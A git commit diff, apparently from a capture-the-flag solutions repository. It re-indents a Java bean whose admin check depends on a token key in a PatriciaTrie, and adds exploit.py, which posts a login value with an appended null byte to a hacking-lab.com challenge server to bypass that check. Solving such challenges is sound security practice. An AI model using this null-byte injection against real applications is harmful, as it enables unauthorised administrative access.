4 years ago · 97efd59a23
--- a/13/NotesBean.java
+++ b/13/NotesBean.java
@@ -16,7 +16,7 @@ import org.apache.commons.io.IOUtils;
 
				 public class NotesBean implements Serializable {
			
 
				 
			
 
				 	/**
			
 
				-	 *
			
 
				+	 * 
			
 
				 	 */
			
 
				 	private PatriciaTrie<Integer> trie = init();
			
 
				 	private static final long serialVersionUID = 1L;
			
@@ -42,18 +42,20 @@ public class NotesBean implements Serializable {
 
				 	public void setTrie(String note) {
			
 
				 		trie.put(unescapeJava(note), 0);
			
 
				 	}
			
 
				+		
			
 
				+    private static PatriciaTrie<Integer> init(){
			
 
				+        PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
			
 
				+        trie.put(securitytoken,0);
			
 
				 
			
 
				-  private static PatriciaTrie<Integer> init(){
			
 
				-    PatriciaTrie<Integer> trie = new PatriciaTrie<Integer>();
			
 
				-    trie.put(securitytoken,0);
			
 
				-    return trie;
			
 
				-  }
			
 
				+        return trie;
			
 
				+    }
			
 
				 
			
 
				-  private static boolean isAdmin(PatriciaTrie<Integer> trie){
			
 
				-    return !trie.containsKey(securitytoken);
			
 
				-  }
			
 
				+    private static boolean isAdmin(PatriciaTrie<Integer> trie){
			
 
				+        return !trie.containsKey(securitytoken);
			
 
				+    }
			
 
				+
			
 
				+    private static InputStream getStreamFromResourcesFolder(String filePath) {
			
 
				+    	  return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
			
 
				+    	 }
			
 
				 
			
 
				-  private static InputStream getStreamFromResourcesFolder(String filePath) {
			
 
				-  	return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);
			
 
				-  }
			
 
				 }
			
--- a/13/exploit.py
+++ b/13/exploit.py
@@ -0,0 +1,34 @@
 
				+#!/usr/bin/python
			
 
				+
			
 
				+import requests
			
 
				+from bs4 import BeautifulSoup as bs
			
 
				+
			
 
				+URL = "http://whale.hacking-lab.com:8888/trieme/index.xhtml"
			
 
				+
			
 
				+session = requests.session()
			
 
				+
			
 
				+# Get view state
			
 
				+response = session.get(URL)
			
 
				+if response.status_code != 200:
			
 
				+    print("Server returned %d %s" % (response.status_code, response.reason))
			
 
				+    exit(1)
			
 
				+
			
 
				+html = bs(response.text, 'lxml')
			
 
				+viewState = html.find("input", { "id": "javax.faces.ViewState" })
			
 
				+if viewState is None:
			
 
				+    print("Could not find javax.faces.ViewState")
			
 
				+    exit(2)
			
 
				+
			
 
				+params = {
			
 
				+    "j_idt14": "j_idt14",
			
 
				+    "j_idt14:j_idt15": "login",
			
 
				+    "j_idt14:name": "auth_token_4835989\0",
			
 
				+    "javax.faces.ViewState": viewState['value']
			
 
				+}
			
 
				+
			
 
				+response = session.post(URL, data=params)
			
 
				+if response.status_code != 200:
			
 
				+    print("Server returned %d %s" % (response.status_code, response.reason))
			
 
				+    exit(1)
			
 
				+
			
 
				+print(response.text)